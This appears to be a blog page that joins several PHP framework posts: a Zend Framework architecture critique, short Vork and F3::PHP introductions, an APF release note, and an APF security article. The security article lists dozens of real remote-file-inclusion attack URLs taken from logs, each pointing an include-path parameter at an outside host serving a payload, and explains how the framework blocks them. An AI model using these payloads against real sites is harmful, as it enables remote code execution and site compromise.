Before we begin our exploration of the architecture of the Zend Framework (ZF), it is important to discuss how a typical MVC application is built. Examining and understanding the architecture of an MVC Web application allows you to make more contextually sound choices when building your application.
The three-tier architecture focuses on defining responsibilities between different parts of the application. It has the following tiers:
Presentation Tier The top-most level of the application is the UI. The main function of the interface is to translate tasks and results to something the user can understand.
Application Tier This layer coordinates the application, processes commands, makes logical decisions and evaluations, and performs calculations. It also moves processes data between the two surrounding layers.
Data Tier Here information is stored and retrieved from a database or file system. The information is then passed back to the logic tier for processing, and then eventually back to the user.
Although the three-tiers is similar to the MVC architecture, they are different. Conceptually the three-tier architecture is linear. The Presentation tier never communicates directly with the data tier and all communication must pass through the Application tier. However, the MVC architecture is triangular: the View sends updates to the Controller, the Controller updates the Model, and the View gets updated directly from the Model.
Zend Framework provides components for the MVC and Table Gateway design patterns which are used in most Web applications. Developed by Zend Technologies and released in 2005, Zend Framework is heavily based on the Solar Framework, developed by Paul M. Jones, reason why they share a similar underlying architecture.
There are 3 types of Web application frameworks:
Zend Framework not only offers a solid infrastructure, but also an extensive component library. The component structure of ZF is somewhat unique, each component is designed with few dependencies on other components. This loosely-coupled architecture allows developers to use components individually.
The framework architecture is based on the Front Controller and Model-View-Controller architectural patterns:
MVC pattern
The Model is the part of the application that defines its basic functionality behind a set of abstractions. The data access layer and some business logic is defined in the Model. The Views define exactly what is presented to the user. Usually controllers pass data to each view to render in some format. The Controllers bind the whole pattern together. They may manipulate models, decide which view to display based on the user’s request and other factors, pass along the data that each view will need, or hand off control to another controller entirely.
Front Controller pattern
Zend_Controller is the heart of Zend Framework’s MVC system. Zend_Controller_Front implements a Front Controller pattern, in which all requests are intercepted by the front controller and dispatched to individual Action Controllers based on the URL requested.
ZF provides a loosely-coupled component library simplified to provide most of the functionality everyone needs to develop Web applications. In object-oriented programming coupling or dependency is the degree to which each component relies on each one of the other components. The biggest advantage of a loosely-coupled architecture is that it allows developers to use components individually.
Neil Garb did an excellent job measuring the level of coupling in the Zend Framework based on the number of dependencies set in code. I’ve extended his work by measuring the level of coupling between components set at runtime. I’m using the Inclued extension to trace through the hierarchy of file inclusions and class inheritance at runtime.
The following diagrams where generated using Graphviz:
Zend_Controller dependencies
Zend_Controller and Zend_Db dependencies
Zend_Controller, Zend_Db and Zend_From dependencies
A standard Zend Framework application requires the following components: Zend_Controller, Zend_Uri, Zend_Registry, Zend_Loader, Zend_Config, Zend_Layout, Zend_View, Zend_Filter, Zend_Validate, Zend_Db, Zend_Form and Zend_Exception.
Zend Framework is intended to serve as a novel way to manage Web development complexity. Many consider ZF to deliver reasonably well on this promise, however, it does not universally accommodate all design styles, environments or requirements.
Performance
The performance of a framework is influenced by many factors, particularly the configuration of your servers. However, the design of an application can make a big difference and determine whether your site is slow or highly responsive. Recent benchmarks show that the Zend Framework is slower than other Web frameworks.
Although low coupling is a sign of a well-structured system, it may reduce performance, and a highly-coupled system is sometimes desirable to achieve maximum efficiency. Regardless, in many modern frameworks, the cost of reduced performance is often seen as a worthy trade for the benefits to the software development process that result from low coupling.
Design
Although the framework supports modularity, it lacks of some basic features, such as a Module Coordinator. The system doesn’t include any component or configuration mechanism to deal with Model and Controller dependencies, making it very difficult to share modules between applications. Also, Zend_Controller doesn’t allow modular systems to load model files from within its own module as well as outside modules.
The system lacks of local containers to manage object dependencies and interrelationships. Instead, it uses a global container to store objects. According to Troels Knak-Nielsen, the problem with this is that a global container, whether primitive or sophisticated, will always be a global symbol. Most programmers will agree that global variables are bad design, and that goes for a global containers as well.
Namespaces
With PHP 5.3 coming up on the horizon, the Zend Framework API faces a re-design. While namespaces will hopefully lead to more readable code, Zend developers will finally need to start thinking about some standards for abstract classes and interfaces.
Possibly related posts: (automatically generated)
Vork is an open-source PHP framework designed for rapid development of performance-oriented scalable applications.
The mission of Vork is to provide an MVC architecture and full-featured toolkit in a gimmick-free no-frills approach without adding overhead, creating slow & unscalable abstraction layers or re-inventing native PHP functionality.
In 2009, a drastic increase of XSS and code injection attacks could be recognized on the APF web site. Analyzing the log files, we found 92,334 known attacks that were catched by the framework and a total number of 672,152 attacks.
The APF Security Promise: Use the APF and profit by its security mechanisms! From scratch securely designed applications prevent the compromise of your system, guarantee the safety of your users data and of your reputation and let you put your mind at ease.
This article describes, which mechanisms are included in the APF to face this danger and to secure your custom application.
As described in the article Hacking & das APF (German), most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third party content or code into the target application. Fortunately, the signature of these attacks is similar in 95% of the attacks. Here is the pattern description:
Merely, the name of the parameter differs from request to request:
The subsequent code box contains a selection of urls, that have been used to display third party content on the APF web page or to inject third party code into the APF:
1/!rfihttp://www.nicheresaleprofits.com/cbmarketer/image/id?? /!scan23http://sito.blackdrag0n.net/Cartoon/idnew.txt? /%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? /%20%20//?_shop_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt??? /%20%20//?mosconfig_absolute_path=http://largeface.com/gnuboard4/gnus/fxid.txt? /%20%20//inc/functions_inc.php?gb_pfad=http://82.146.51.16/scan/copyright.txt?? /%20%20//includes/DProtect/Framework/EmailTemplates.class.php?GLOBALS[RootPath]=http://www.junggosum.com/bbs/data/sports_2/idxx.txt?? /%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://n34.biz/id1.txt??? /%20%20//tools/send_reminders.php?noSet=0&includedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? /%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? /?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? /?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? /?_zb_path=http://kb27.co.kr/bbs///data/cok.txt?? /tools/send_reminders.php?includedir=http://208.98.22.241/id.txt??%0D?? /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://204.3.167.134/xxx? /modules/My_eGallery/index.php?basepath=http://urogyn.co.kr/uro/install/idxx.txt?? /show_news.php?cutepath=http://laloggia.by.ru/up/ctrl.txt?? /skin/zero_vote/setup.php?dir=http://206.126.97.21/~talagaho/id.txt??? /Neos_Chronos/header.php?base_folder=http://www.jocainmo.es/img/.z/d?? /buscar.php?query=http://www.candidography.com/id1.txt?? /?_PHPLIB[libdir]=http://cdshop.net.ru////cron/hjr.txt?? /inc/cmses/aedating4CMS.php?dir[inc]=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? /naboard_pnr.php?skin=http://www.cinepopbrasil.com.br/sistem.txt??? /phpSecurePages/secure.php?&cfgProgDir=http://www.steannareptile.it//administrator/idi.txt??? /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://tdaa.by.ru/safe.txt??? /skin/ggambo7002_board/contact.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? /jahoot.com/search.php?=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://laloggia.by.ru/up/ctrl.txt?? /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?http://musicadelibreria.net/footer?? /Page//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://kb27.co.kr/bbs///data/cok.txt??
The files xss_report_2009_with_urls_grouped.txt.gz and xss_report_2009_with_urls_uniq.txt.gz contain a variety of urls, that have been used during 2009 attacks. xss_report_2009_with_urls_uniq.txt.gz contains a complete list of urls, xss_report_2009_with_urls_grouped.txt.gz contains a grouped list with identical base urls.
After having checked Apache’s access logfiles, we started to analyze the application log files. This effort resulted in 3 groups of attacks. All of them tried to manipulate the url to inject content or code to the application:
1parse_url(/Seite/048-Webseite-erstellen%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/apps/tools/link/frontcontrollerLinkHandler.php, Line: 306) [Document::__loadContentFromFile()] Design "Seite" not existent in namespace "modules::comments::pres::templates"! Please check your template code (<29e6fe038415c51c1bbac0271949edf5 /><a name="comments"></a><h2><html:getstring namespace="modules::comments" config="language" entry="header.title" /></h2><68a3d33630357505bfe4dd96dbcb492e />). (Number: 256, File: ***/apps/core/pagecontroller/pagecontroller.php, Line: 1378) [Frontcontroller::__parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "sites::demosite::biz::actions" and context "sites::***"! (Number: 256, File: ***/apps/core/frontcontroller/Frontcontroller.php, Line: 555)
The first line is a try-out to inject external code. If the offender would have been successful, the code is used to spy out information about the webserver and the application running on the machine. Subsequent request are then used to explicitly manipulate the application and the content.
In case the developer uses URL rewriting, such attacks ara quite worthless, because the InputFilter rewrites the url to a generic param value couple.
In case the developer uses the APF components like the LinkHandler or the FrontcontrollerLinkHandler, urls like presented above are recognized semantically invalid and an error is thrown. This error can be caugth and logged by the integrated Error handling very easily.
The second line describes the attempt to manipulate a known parameter of the application to display third party content. Potentially, the APF offers the chance to manipulare the template included by the <core:importdesign /> taglib by changing the url, but the template path is created with security in mind.
In the third line the attacker tries to manipulate a param of a front controller action to execute the desired action. Within the APF, actions are defined within a configuration file and the url params only refer to this configuration. Hence, it is not possible to successfully manipulate an action call by url.
In order to not provide much information to the attacker, it is recommended to implement a special ErrorHandler that logs the upcoming errors to a log file and keeps quiet on the cause of the error.
The wiki page Script kiddies ErrorHandler (German) describes, how you can implement such a ErrorHandler.
The APF team is proud to anounce the new website together with the 1.11 stable release.
Revision 1.11 comes up with a revised version of the form support on the basis of taglibs. Now generic definition of validators and filters on the basis of the observer pattern is supported and forms can be easier adjusted to own needs.
The OR mapper GenericORMapper, already added in the release 1.9, was extended with tools to automatically setup and update a database. Now the developer can completely concentrate on the development of the logic of the application since the storage of the objects is completely managed by the mapper.
Part of the release’s performance optimization were optimizations in the core of the frameworks and the rework of the integrated BenchmarkTimer. It now supplies the developer with a better graphical representation of the measurements to find hot spots within an application. Thus an application can be optimally prepared for operation.
With release of version 1.11 the support for PHP 4 has been announced for discontinuation and the compatibility with PHP 5.3 has been improved. The coming version 1.12 will focus on the extension of the new form support and the rework of the configuration component.
The new release files can be downloaded from http://adventure-php-framework.org/Page/008-Downloads.
F3::PHP is a single-file PHP 5.3+ Web development framework with a fast template engine, HTML forms processor and an easy-to-use SQL handler for databases. All that in one tiny package!
Too often we see code hyped up as “frameworks”. But when it comes to applying them to real-world situations, they fall short and sloppy or at the other end of the scale – are huge beasts that behave like control freaks – which make them unusable or hostile to average programmers.
Some are touted as frameworks yet they act simply as front-end controllers which do nothing more than route URLs to classes, functions or include files in complicated directory structures. They make programming a bit easier, but lacking in many MVC aspects. Other procedural frameworks use method chaining (which can be quite long), you’d wonder at times what the right sequence should be. Some are simply too bloated with too many features than you’ll ever need to use in simple blog or wiki applications.
Most frameworks brag about being “lightweight” – which seems to be a relative term. Does a 50MByte framework that consumes a lot of resources qualify as lightweight? Let’s call a spade a spade. A cargo truck is lightweight compared to a jumbo jet. Indeed. But if all we need to do to get from here to there on a “regular” basis is a car with some room to spare, why ride the space shuttle? Extra features are more often overkill, like using a jackhammer instead of a screwdriver.
It seems like in the name of “improving” their software, developers simply forgot or ignored the fact that frameworks are meant to support structures, that is, make applications easier to fabricate and provide order along with industrial strength – not to be imposing structures themselves. This point is argumentative and has been going on since the days of the pyramid builders. Architects and engineers have gone thru endless debates because the first is focused on artistic freedom, the latter on structural integrity.
Whichever the case may be, minimalism in framework design – where elegant architectual patterns and engineering excellence are available – is not a philosophy that’s commonplace. However, it does manage to find its niche here and there.
This is where the F3::PHP makes its mark. The minimalist framework is so rooted in its Zen world of construction components, that an entire Web application can be developed in so little, yet streamlined, code. That of course means a lot when we’re talking programmer productivity and time-to-deploy.
In fact, the entire F3::PHP command set has only 15 static methods and 6 template directives. Make no mistake about its puny size, it’s got everything a Web designer needs to get any kind of job done. You won’t see the fancy stuff found in large frameworks. It aims to be usable – not usual. It’s very much like a modern compact Javascript toolkit for PHP.
F3::PHP gives you a lot of freedom. It won’t change your programming style, only your habits – albeit due to the powerful tools you’ll have at your disposal. Despite that, F3::PHP is certainly not an end-all, be-all framework. It’s not for everyone – only for those who want raw power behind simplicity.
